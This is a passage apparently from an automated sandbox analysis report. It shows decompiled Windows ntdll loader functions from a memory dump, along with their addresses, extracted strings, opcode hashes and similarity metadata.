						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E011B9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1275780 & 0x00000005) != 0) {
						_push(_t49);
						E01205510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                      0x011b8e0f
                                                                      0x011b8e16
                                                                      0x011b8e19
                                                                      0x011b8e1b
                                                                      0x011b8e21
                                                                      0x011b8e7f
                                                                      0x011b8e85
                                                                      0x011f9354
                                                                      0x011f936c
                                                                      0x011f9371
                                                                      0x011f937b
                                                                      0x011f9381
                                                                      0x011f9381
                                                                      0x011f937b
                                                                      0x011b8e9d
                                                                      0x011b8e9d
                                                                      0x011b8e29
                                                                      0x011b8e2c
                                                                      0x011b8e38
                                                                      0x011b8e3e
                                                                      0x011b8e43
                                                                      0x011b8eb5
                                                                      0x011b8eb9
                                                                      0x011f92aa
                                                                      0x011f92af
                                                                      0x011f92e8
                                                                      0x011f92e8
                                                                      0x011f92af
                                                                      0x011b8eb9
                                                                      0x011b8e45
                                                                      0x011b8e53
                                                                      0x011b8e5b
                                                                      0x011b8e5f
                                                                      0x011b8e78
                                                                      0x011b8e78
                                                                      0x011b8e7d
                                                                      0x011b8ec3
                                                                      0x011b8ecd
                                                                      0x011b8ed2
                                                                      0x011b8ed2
                                                                      0x011b8ec5
                                                                      0x011b8ec5
                                                                      0x00000000
                                                                      0x011b8e7d
                                                                      0x011b8e67
                                                                      0x011b8ea4
                                                                      0x011f931a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011f9320
                                                                      0x011b8ea4
                                                                      0x011b8e70
                                                                      0x011f9325
                                                                      0x011f9340
                                                                      0x011f9345
                                                                      0x011f9345
                                                                      0x011b8e76
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      Strings
                                                                      • LdrpFindDllActivationContext, xrefs: 011F9331, 011F935D
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 011F933B, 011F9367
                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 011F932A
                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 011F9357
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 0-3779518884
                                                                      • Opcode ID: b69a29248bb4936cc87fe346d091d54a830b68debde0f669556db1822689499b
                                                                      • Instruction ID: a2ca4f3f7f019c8c2ad99ec6307dda5577e0f23314da7e47959f9b63036e9584
                                                                      • Opcode Fuzzy Hash: b69a29248bb4936cc87fe346d091d54a830b68debde0f669556db1822689499b
                                                                      • Instruction Fuzzy Hash: 5C41DA35A003359FDB3EAB1CD8CDBFAB6ADAB04E58F0A416DE90457151E770AD80C782
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01198794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 83%
                                                                      			E01198794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0119934A() != 0) {
								_t159 = E0120A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1275780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01205510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1275780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0119849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01198999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01198999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1275c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1275c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E011A2280(_t92, 0x12786cc);
															_t94 = E01259DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E011B61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1275c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01198A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1275c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1275c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E011CF380(_t136, 0x1161184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E011A2280(_t108, 0x12786cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E011B61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01259D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0119FFB0(_t118, _t156, 0x12786cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E011C9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                      0x01198799
                                                                      0x0119879d
                                                                      0x011987a1
                                                                      0x011987a3
                                                                      0x011987a8
                                                                      0x011987c3
                                                                      0x011987c3
                                                                      0x011987c8
                                                                      0x011987d1
                                                                      0x011987d4
                                                                      0x011987d8
                                                                      0x011987e5
                                                                      0x011987ec
                                                                      0x011e9bfe
                                                                      0x011e9c00
                                                                      0x011e9c02
                                                                      0x011e9c08
                                                                      0x011e9c0d
                                                                      0x011e9c0f
                                                                      0x011e9c14
                                                                      0x011e9c2d
                                                                      0x011e9c32
                                                                      0x011e9c37
                                                                      0x011e9c3a
                                                                      0x011e9c3c
                                                                      0x011e9c42
                                                                      0x011e9c42
                                                                      0x011e9c3c
                                                                      0x011e9c02
                                                                      0x011987da
                                                                      0x011987df
                                                                      0x011987e3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011987e3
                                                                      0x011987f2
                                                                      0x00000000
                                                                      0x011987fb
                                                                      0x011987fd
                                                                      0x011987fe
                                                                      0x0119880e
                                                                      0x0119880f
                                                                      0x01198810
                                                                      0x01198814
                                                                      0x0119881a
                                                                      0x0119881c
                                                                      0x0119881f
                                                                      0x01198821
                                                                      0x01198822
                                                                      0x01198824
                                                                      0x01198826
                                                                      0x0119882c
                                                                      0x0119882e
                                                                      0x011e9c48
                                                                      0x011e9c48
                                                                      0x01198834
                                                                      0x01198834
                                                                      0x01198837
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01198837
                                                                      0x0119882e
                                                                      0x0119883d
                                                                      0x01198840
                                                                      0x01198843
                                                                      0x01198846
                                                                      0x01198849
                                                                      0x0119884c
                                                                      0x0119884e
                                                                      0x01198850
                                                                      0x01198852
                                                                      0x01198854
                                                                      0x01198857
                                                                      0x011988b4
                                                                      0x011988b6
                                                                      0x011988b6
                                                                      0x01198859
                                                                      0x01198859
                                                                      0x01198859
                                                                      0x01198861
                                                                      0x01198866
                                                                      0x0119886a
                                                                      0x0119893d
                                                                      0x01198941
                                                                      0x00000000
                                                                      0x01198947
                                                                      0x01198947
                                                                      0x0119894a
                                                                      0x0119894c
                                                                      0x00000000
                                                                      0x01198952
                                                                      0x01198955
                                                                      0x0119895a
                                                                      0x0119895d
                                                                      0x0119895d
                                                                      0x0119895f
                                                                      0x01198961
                                                                      0x01198961
                                                                      0x01198968
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0119896a
                                                                      0x0119896b
                                                                      0x0119896e
                                                                      0x00000000
                                                                      0x01198970
                                                                      0x01198970
                                                                      0x01198970
                                                                      0x01198970
                                                                      0x01198972
                                                                      0x01198972
                                                                      0x01198974
                                                                      0x00000000
                                                                      0x0119897a
                                                                      0x0119897a
                                                                      0x0119897d
                                                                      0x00000000
                                                                      0x01198983
                                                                      0x011e9c65
                                                                      0x011e9c6d
                                                                      0x011e9c72
                                                                      0x011e9c75
                                                                      0x011e9c75
                                                                      0x011e9c82
                                                                      0x011e9c86
                                                                      0x011e9c87
                                                                      0x011e9c88
                                                                      0x011e9c89
                                                                      0x011e9c8c
                                                                      0x011e9c90
                                                                      0x011e9c95
                                                                      0x011e9c97
                                                                      0x011e9ca0
                                                                      0x011e9ca3
                                                                      0x011e9ca9
                                                                      0x011e9ca9
                                                                      0x00000000
                                                                      0x011e9ca9
                                                                      0x011e9ca3
                                                                      0x00000000
                                                                      0x011e9c97
                                                                      0x0119897d
                                                                      0x00000000
                                                                      0x01198974
                                                                      0x01198988
                                                                      0x01198992
                                                                      0x01198996
                                                                      0x00000000
                                                                      0x01198996
                                                                      0x0119894c
                                                                      0x00000000
                                                                      0x01198870
                                                                      0x0119887b
                                                                      0x0119887d
                                                                      0x0119887f
                                                                      0x01198881
                                                                      0x01198884
                                                                      0x01198884
                                                                      0x01198886
                                                                      0x01198889
                                                                      0x0119888c
                                                                      0x0119888e
                                                                      0x01198891
                                                                      0x01198891
                                                                      0x01198898
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0119889a
                                                                      0x0119889b
                                                                      0x0119889e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011988a0
                                                                      0x011988a8
                                                                      0x011988b0
                                                                      0x011988b2
                                                                      0x011988d3
                                                                      0x011988d5
                                                                      0x00000000
                                                                      0x011988d7
                                                                      0x011988db
                                                                      0x011988dc
                                                                      0x011988e0
                                                                      0x011988e8
                                                                      0x011988ee
                                                                      0x011988f0
                                                                      0x011988f3
                                                                      0x011988fc
                                                                      0x01198901
                                                                      0x01198906
                                                                      0x0119890c
                                                                      0x0119890c
                                                                      0x0119890f
                                                                      0x01198916
                                                                      0x01198917
                                                                      0x01198918
                                                                      0x01198919
                                                                      0x0119891a
                                                                      0x0119891f
                                                                      0x01198921
                                                                      0x011e9c52
                                                                      0x011e9c55
                                                                      0x011e9c5b
                                                                      0x011e9cac
                                                                      0x011e9cc0
                                                                      0x011e9cc0
                                                                      0x011e9c55
                                                                      0x01198927
                                                                      0x01198927
                                                                      0x0119892f
                                                                      0x01198933
                                                                      0x00000000
                                                                      0x011988f5
                                                                      0x011988f5
                                                                      0x00000000
                                                                      0x011988f7
                                                                      0x011988f7
                                                                      0x011988fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011988fa
                                                                      0x011988f5
                                                                      0x011988f3
                                                                      0x00000000
                                                                      0x011988d5
                                                                      0x00000000
                                                                      0x011988b2
                                                                      0x011988c9
                                                                      0x00000000
                                                                      0x011988c9
                                                                      0x0119887f
                                                                      0x0119886a
                                                                      0x01198857
                                                                      0x01198852
                                                                      0x011988bf
                                                                      0x011988bf
                                                                      0x011987aa
                                                                      0x011987ad
                                                                      0x011987ae
                                                                      0x011987b4
                                                                      0x011987b5
                                                                      0x011987b6
                                                                      0x011987b8
                                                                      0x011987bd
                                                                      0x011987c1
                                                                      0x011987f4
                                                                      0x011987fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011987c1
                                                                      0x00000000

                                                                      Strings
                                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 011E9C18
                                                                      • LdrpDoPostSnapWork, xrefs: 011E9C1E
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 011E9C28
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 2994545307-1948996284
                                                                      • Opcode ID: 1bb26b319eb1467c02883dafa4072e9a7c58708ba2f7eae486b48e07ce5f1d55
                                                                      • Instruction ID: 836abdfb035afef2b153f49065c1d725ac272240fcfb8c5f0cd2aceb36491b62
                                                                      • Opcode Fuzzy Hash: 1bb26b319eb1467c02883dafa4072e9a7c58708ba2f7eae486b48e07ce5f1d55
                                                                      • Instruction Fuzzy Hash: E5911331A0060EEFEF1CDF59D480ABAB7B5FF86318B454169D925AB241E730ED11CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01197E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 011E98A2
                                                                      • LdrpCompleteMapModule, xrefs: 011E9898
                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 011E9891
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                      • API String ID: 0-1676968949
                                                                      • Opcode ID: 73b7520aea714b5acb58486994c6d7975debc049dd91f336bd0e45e8764ee7ea
                                                                      • Instruction ID: 218970596c73cb67bed75bd3ac438850757e527dd7f0d72a6fc33760dc22b66a
                                                                      • Opcode Fuzzy Hash: 73b7520aea714b5acb58486994c6d7975debc049dd91f336bd0e45e8764ee7ea
                                                                      • Instruction Fuzzy Hash: 6151F635614B49DBEB2ECBADC944B7A7BE4AF00318F040659E9619B3E1D734ED00CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0118E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • @, xrefs: 0118E6C0
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0118E68C
                                                                      • InstallLanguageFallback, xrefs: 0118E6DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                      • API String ID: 0-1757540487
                                                                      • Opcode ID: 371d7937dc500f7e63096591fcc3032a2c454fbbed07dbdf625c608c74e888ac
                                                                      • Instruction ID: 6a08605e17f0cb8e172937646e812e42a4abd1ea3d5e0daffbb511e17bc1ea10
                                                                      • Opcode Fuzzy Hash: 371d7937dc500f7e63096591fcc3032a2c454fbbed07dbdf625c608c74e888ac
                                                                      • Instruction Fuzzy Hash: 8A5111766097469BD718EF68C444B6BB7E9BF98718F01092EF985D7200F734DA04CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012051BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: Legacy$UEFI
                                                                      • API String ID: 2994545307-634100481
                                                                      • Opcode ID: 1b0e94e4613a1f8aa98def236063f67d19fa4479745a635c4f414117a301e74e
                                                                      • Instruction ID: 48473ec2af7d50299ce35070cdff092d526c455ed7ceacdb545ff03264a2e4ef
                                                                      • Opcode Fuzzy Hash: 1b0e94e4613a1f8aa98def236063f67d19fa4479745a635c4f414117a301e74e
                                                                      • Instruction Fuzzy Hash: 25517D71A206099FDB26DFA8C980BADBBF8FF58704F14452DE649EB292D7719900CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011AB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011AB9A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 885266447-0
                                                                      • Opcode ID: eb25e9560301d1b673fdabcad8d09fd6c16c64e4b29e12371f82fa37c4c7f390
                                                                      • Instruction ID: f14e6263900b551dae1222ca9b42947967d94e0f4c319f1db641fb0b483dc72e
                                                                      • Opcode Fuzzy Hash: eb25e9560301d1b673fdabcad8d09fd6c16c64e4b29e12371f82fa37c4c7f390
                                                                      • Instruction Fuzzy Hash: 61516AB5608381CFC728CF69C09092BBFE5FB88614F95496EEA8587345D731E844CB96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0118B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _vswprintf_s
                                                                      • String ID:
                                                                      • API String ID: 677850445-0
                                                                      • Opcode ID: 32b77ba1c6612657b6027342fbd021233fde1e5339dafee6e8e9f0538d260a3c
                                                                      • Instruction ID: 50c47ee6c12fbd83ecc7ec1d6ee2e7c3e41736d884e095db91d5769b6a304f62
                                                                      • Opcode Fuzzy Hash: 32b77ba1c6612657b6027342fbd021233fde1e5339dafee6e8e9f0538d260a3c
                                                                      • Instruction Fuzzy Hash: 0851F171D006598EEF39CFE8C848BAEBBF1AF04714F1041ADE859EBA82D7344941CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011B2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PATH
                                                                      • API String ID: 0-1036084923
                                                                      • Opcode ID: 0da6f2a8b2351026cd9b56c9f9d0527fdbdeda522ed0145d969379f041de7aa6
                                                                      • Instruction ID: 2152a77cc3bc24a2e4554c04941ae0e9b107b7423252e31b3168d99e7724731b
                                                                      • Opcode Fuzzy Hash: 0da6f2a8b2351026cd9b56c9f9d0527fdbdeda522ed0145d969379f041de7aa6
                                                                      • Instruction Fuzzy Hash: FBC1B071E00619EBDB2DDF99D8C1BEEBBB1FF58700F054029E901AB250E774A946CB64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011BFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 011FBE0F
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                      • API String ID: 0-865735534
                                                                      • Opcode ID: 160f92b1a0bf686c0968e6ac1ca7a52372b4260ebaabaf00749ec0cf8c5be492
                                                                      • Instruction ID: d04b151962935ae50aec8ede213dc468f6495cae8e324680a44b24784f8fcfc2
                                                                      • Opcode Fuzzy Hash: 160f92b1a0bf686c0968e6ac1ca7a52372b4260ebaabaf00749ec0cf8c5be492
                                                                      • Instruction Fuzzy Hash: 8EA10671B00617CBEB2DDF68C894BBEB7A5AF44724F04456DEA16CB681DB30D842CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01182D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Re-Waiting
                                                                      • API String ID: 0-316354757
                                                                      • Opcode ID: 6942ede063548a2aacc1578daa5ad7629acbb3787f457a8c244b5d6f518eab3d
                                                                      • Instruction ID: be1888275cbf578a46193945d665f18a12ddd01e972a9d159a089d19bd16f1c6
                                                                      • Opcode Fuzzy Hash: 6942ede063548a2aacc1578daa5ad7629acbb3787f457a8c244b5d6f518eab3d
                                                                      • Instruction Fuzzy Hash: 5A613631A006569FDB3EEF6CC884B7E7BE5EB40714F158269E512972C1D7349A02CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01250EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `
                                                                      • API String ID: 0-2679148245
                                                                      • Opcode ID: 064d16ed3242202b0fb4a99f4b54889b4225867efa59874685fac449a673e60f
                                                                      • Instruction ID: 6539d1af17e7ed768cd5cffe0383e53c289903c25298d6cf0404f4b87590e42e
                                                                      • Opcode Fuzzy Hash: 064d16ed3242202b0fb4a99f4b54889b4225867efa59874685fac449a673e60f
                                                                      • Instruction Fuzzy Hash: 87518A713243429BE365DF28D9C5B2BBBE5EBC4714F04092CFA9697290DA71E805CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011BF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                      • Instruction ID: e054626a5a43b9ccdc13859b9cc138a3240ae7e1bdc1a06a727dea84951c03d3
                                                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                      • Instruction Fuzzy Hash: F0519E71504715AFC324DF29C840A6BBBF8FF58B14F00892EFA95876A0E7B4E915CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01203540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryHash
                                                                      • API String ID: 0-2202222882
                                                                      • Opcode ID: ed65187d3d79831f102b1dd86ab476a0e818f4cb9adfcffbefb4d6ea62815768
                                                                      • Instruction ID: f35902b9e65f45d8e2b11d7e55eb4d9cb7a2fcfe61df58b189093f7a5e23820b
                                                                      • Opcode Fuzzy Hash: ed65187d3d79831f102b1dd86ab476a0e818f4cb9adfcffbefb4d6ea62815768
